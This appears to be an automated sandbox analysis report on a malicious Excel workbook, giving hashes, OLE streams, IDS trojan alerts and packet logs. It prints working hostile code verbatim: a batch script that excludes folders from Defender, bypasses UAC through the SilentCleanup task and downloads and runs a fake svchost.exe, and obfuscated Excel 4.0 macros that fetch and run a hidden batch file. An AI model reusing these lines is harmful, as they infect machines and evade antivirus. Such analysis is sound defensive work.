                                                                Preview: mode 18,1..color FE..setlocal..for /f "tokens=4-5 delims=. " %%i in ('ver') do set VERSION=%%i.%%j..if "%version%" == "10.0" ( echo "Windows 10 detected" ..reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "$env:temp" ;Add-MpPreference -ExclusionPath "$env:appdata" ;Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;&REM " >nul..timeout /t 2 >nul..schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nul..timeout /t 3 >nul..reg delete "HKCU\Environment" /v "windir" /F..)..if "%version%" == "6.3" ( echo "Windows 8.1 detected" ..reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "$env:temp" ;Add-MpPreference -ExclusionPath "$env:appdata" ;Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');St

                                                                Static File Info

                                                                General

                                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: blobijump, Create Time/Date: Sun Sep 20 22:17:44 2020, Last Saved Time/Date: Sun Jan 3 23:14:32 2021, Security: 1
                                                                Entropy (8bit):7.633051633259433
                                                                TrID:
                                                                • Microsoft Excel sheet (30009/1) 47.99%
                                                                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                File name:1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls
                                                                File size:162304
                                                                MD5:4468e0175c68f3751fc2027f1e42ca0c
                                                                SHA1:c19aff367853c61d750b2da47623b69d8c1b42bb
                                                                SHA256:4054344f07e1877b2cbb1a13c9bee260f0ae1f41c713374ccb9b130e3bae19a6
                                                                SHA512:40ab75cb6da2ad826511fc9f26fb971dc634749ae218f0b19d80ba2c587257696647be80c169800b7434166308f5967e4ca6247a25604642cb8630a710cbdabe
                                                                SSDEEP:3072:SVnSGiysRchNXHfA1MiWhZFGkEld+Dr7BbtEG1euinw2avphbLJBr1oibsnlYH9I:6nSGiysRchNXHfA1MiWhZFVEld+Dr7BE
                                                                File Content Preview:........................;...................................:..................................................................................................................................................................................................

                                                                File Icon

                                                                Icon Hash:e4eea286a4b4bcb4

                                                                Static OLE Info

                                                                General

                                                                Document Type:OLE
                                                                Number of OLE Files:1

                                                                OLE File "1e9b445cb987e5a1cb3d15e6fd693309a4512e53e06ecfb1a3e707debdef7355.xls"

                                                                Indicators

                                                                Has Summary Info:True
                                                                Application Name:unknown
                                                                Encrypted Document:False
                                                                Contains Word Document Stream:False
                                                                Contains Workbook/Book Stream:True
                                                                Contains PowerPoint Document Stream:False
                                                                Contains Visio Document Stream:False
                                                                Contains ObjectPool Stream:
                                                                Flash Objects Count:
                                                                Contains VBA Macros:True

                                                                Summary

                                                                Code Page:1252
                                                                Last Saved By:blobijump
                                                                Create Time:2020-09-20 21:17:44
                                                                Last Saved Time:2021-01-03 23:14:32
                                                                Security:1

                                                                Document Summary

                                                                Document Code Page:1252
                                                                Thumbnail Scaling Desired:False
                                                                Contains Dirty Links:False
                                                                Shared Document:False
                                                                Changed Hyperlinks:False
                                                                Application Version:1048576

                                                                Streams

                                                                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 276
                                                                General
                                                                Stream Path:\x5DocumentSummaryInformation
                                                                File Type:data
                                                                Stream Size:276
                                                                Entropy:3.16930549839
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . . . F e u i l l e s d e c a l c u l . . . . . . . . . . . . . . . . . M a c r o
                                                                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 98 00 00 00 02 00 00 00 e4 04 00 00
                                                                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 156
                                                                General
                                                                Stream Path:\x5SummaryInformation
                                                                File Type:data
                                                                Stream Size:156
                                                                Entropy:3.29938329109
                                                                Base64 Encoded:False
                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . L . . . . . . . X . . . . . . . d . . . . . . . . . . . . . . . . . . . b l o b i j u m p . . . @ . . . . L . z . . . . @ . . . . . n 1 & . . . . . . . . . . .
                                                                Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 08 00 00 00 38 00 00 00 0c 00 00 00 4c 00 00 00 0d 00 00 00 58 00 00 00 13 00 00 00 64 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0a 00 00 00 62 6c 6f 62 69 6a 75 6d 70 00 00 00 40 00 00 00
                                                                Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 158653
                                                                General
                                                                Stream Path:Workbook
                                                                File Type:Applesoft BASIC program data, first line number 16
                                                                Stream Size:158653
                                                                Entropy:7.68301819978
                                                                Base64 Encoded:True
                                                                Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . b l o b i j u m p B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p ^ ) 8 . . . . . . . X . @ . .
                                                                Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 09 00 00 62 6c 6f 62 69 6a 75 6d 70 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                Macro 4.0 Code

                                                                ;;;;;;;112;;;;;;"=GET.CELL(5;L581)";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 3; Move-Item """"pd""&CHAR(46)&""bat"""" -Destination """"$e`nV:T`EMP"""""")";;;;;;;;;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd""&CHAR(46)&""bat -Force"")";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 1; attrib +s +h pd""&CHAR(46)&""bat"")";;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 stARt`-slE`Ep 7;cd """"$e`nV:T`EMP; ./pd""&CHAR(46)&""bat"""""")";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(K582)&""owershe^l^l -w 1 (nEw-oB`jecT Ne""&CHAR(116)&CHAR(46)&CHAR(87)&CHAR(101)&""bcLIENt).('Down'+'loadFile').In""&CHAR(118)&""oke('""&CHAR(104)&""ttps://cutt.ly/njaLDrp','pd""&CHAR(46)&""bat')"")";;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

                                                                Network Behavior

                                                                Snort IDS Alerts

                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                01/04/21-19:16:01.877513TCP2022985ET TROJAN Trojan Generic - POST To gate.php with no accept headers4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:01.877513TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:02.870226TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:03.164615TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:03.550129TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:03.695875TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:08.788015TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:08.880536TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:08.968308TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:09.066074TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:14.156343TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:14.243232TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:14.373824TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:14.464342TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:20.188842TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:20.525208TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:20.604695TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:20.695407TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:25.821773TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:25.936414TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:26.045708TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:26.128198TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:31.236564TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:31.327786TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:31.416657TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:31.497657TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:36.587045TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:36.697040TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:36.783519TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:36.862987TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:41.952534TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:42.029712TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:42.119550TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:42.203074TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:47.290327TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:47.380898TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:47.467654TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:47.546960TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:52.639885TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:53.833966TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:53.917467TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:54.001650TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:59.101597TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:59.190733TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:59.283482TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:16:59.363204TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:03.754157TCP2022985ET TROJAN Trojan Generic - POST To gate.php with no accept headers4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:03.754157TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:04.455587TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:04.552220TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:04.565768TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:04.643834TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:04.694197TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:04.724303TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:04.791112TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:04.889751TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:09.805415TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:09.893395TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:09.952816TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:10.015170TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:09.984305TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:10.070359TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:10.086372TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:10.155527TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:15.166876TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:15.225050TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:15.258449TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:15.296495TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:15.339893TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:15.367356TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:15.425207TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:15.429740TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:20.499826TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:20.524227TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:20.594126TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:20.608154TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:20.656460TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:20.719814TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:20.688240TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:20.781973TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:25.787288TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:25.871639TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:25.868453TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:25.932639TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:25.960122TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:25.994359TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:26.040878TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:26.131249TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:31.060841TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:31.131784TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:31.638737TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:31.630045TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:31.695957TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:31.733062TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:31.821298TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:31.899070TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:36.756045TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:36.836218TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:36.899525TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:36.965912TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:36.984596TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:37.065628TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:37.144451TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:37.227199TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:42.043808TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:42.135366TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:42.211040TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:42.274715TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:42.314454TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:42.754303TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:42.880933TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:42.963815TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917180192.168.2.22172.67.167.122
                                                                01/04/21-19:17:47.786000TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:47.858089TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:47.921656TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122
                                                                01/04/21-19:17:47.988914TCP2026071ET TROJAN W32.FakeEzQ.kr Checkin4917280192.168.2.22172.67.167.122

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 4, 2021 19:15:31.115885019 CET49167443192.168.2.22172.67.8.238
                                                                Jan 4, 2021 19:15:31.155934095 CET44349167172.67.8.238192.168.2.22
                                                                Jan 4, 2021 19:15:31.156137943 CET49167443192.168.2.22172.67.8.238
                                                                Jan 4, 2021 19:15:31.180326939 CET49167443192.168.2.22172.67.8.238
                                                                Jan 4, 2021 19:15:31.220463991 CET44349167172.67.8.238192.168.2.22
                                                                Jan 4, 2021 19:15:31.228162050 CET44349167172.67.8.238192.168.2.22
                                                                Jan 4, 2021 19:15:31.228203058 CET44349167172.67.8.238192.168.2.22
                                                                Jan 4, 2021 19:15:31.228230953 CET44349167172.67.8.238192.168.2.22
                                                                Jan 4, 2021 19:15:31.228297949 CET49167443192.168.2.22172.67.8.238
                                                                Jan 4, 2021 19:15:31.243199110 CET49167443192.168.2.22172.67.8.238
                                                                Jan 4, 2021 19:15:31.283288956 CET44349167172.67.8.238192.168.2.22
                                                                Jan 4, 2021 19:15:31.283541918 CET44349167172.67.8.238192.168.2.22
                                                                Jan 4, 2021 19:15:31.488832951 CET49167443192.168.2.22172.67.8.238
                                                                Jan 4, 2021 19:15:33.257802010 CET49167443192.168.2.22172.67.8.238
                                                                Jan 4, 2021 19:15:33.297856092 CET44349167172.67.8.238192.168.2.22
                                                                Jan 4, 2021 19:15:33.378052950 CET44349167172.67.8.238192.168.2.22
                                                                Jan 4, 2021 19:15:33.378097057 CET44349167172.67.8.238192.168.2.22
                                                                Jan 4, 2021 19:15:33.378283024 CET49167443192.168.2.22172.67.8.238
                                                                Jan 4, 2021 19:15:33.382728100 CET4916980192.168.2.2237.46.150.139
                                                                Jan 4, 2021 19:15:33.429598093 CET804916937.46.150.139192.168.2.22
                                                                Jan 4, 2021 19:15:33.429721117 CET4916980192.168.2.2237.46.150.139
                                                                Jan 4, 2021 19:15:33.429898024 CET4916980192.168.2.2237.46.150.139
                                                                Jan 4, 2021 19:15:33.482979059 CET804916937.46.150.139192.168.2.22
                                                                Jan 4, 2021 19:15:33.483009100 CET804916937.46.150.139192.168.2.22
                                                                Jan 4, 2021 19:15:33.483181000 CET4916980192.168.2.2237.46.150.139
                                                                Jan 4, 2021 19:15:33.541407108 CET4916980192.168.2.2237.46.150.139
                                                                Jan 4, 2021 19:15:33.541671038 CET49167443192.168.2.22172.67.8.238
                                                                Jan 4, 2021 19:15:41.484987974 CET49170443192.168.2.22172.67.167.122
                                                                Jan 4, 2021 19:15:41.530745983 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:41.530858994 CET49170443192.168.2.22172.67.167.122
                                                                Jan 4, 2021 19:15:41.538939953 CET49170443192.168.2.22172.67.167.122
                                                                Jan 4, 2021 19:15:41.584742069 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:41.591833115 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:41.591857910 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:41.591944933 CET49170443192.168.2.22172.67.167.122
                                                                Jan 4, 2021 19:15:41.601109028 CET49170443192.168.2.22172.67.167.122
                                                                Jan 4, 2021 19:15:41.646836042 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:41.646967888 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:41.848054886 CET49170443192.168.2.22172.67.167.122
                                                                Jan 4, 2021 19:15:41.943974018 CET49170443192.168.2.22172.67.167.122
                                                                Jan 4, 2021 19:15:41.989763021 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.029306889 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.029329062 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.029340982 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.029347897 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.029359102 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.029372931 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.029434919 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.029458046 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.029464006 CET49170443192.168.2.22172.67.167.122
                                                                Jan 4, 2021 19:15:42.029474974 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.029486895 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.029494047 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.029512882 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.029531956 CET49170443192.168.2.22172.67.167.122
                                                                Jan 4, 2021 19:15:42.029535055 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.029546976 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.029555082 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.029607058 CET49170443192.168.2.22172.67.167.122
                                                                Jan 4, 2021 19:15:42.029623985 CET44349170172.67.167.122192.168.2.22
                                                                Jan 4, 2021 19:15:42.029656887 CET44349170172.67.167.122192.168.2.22
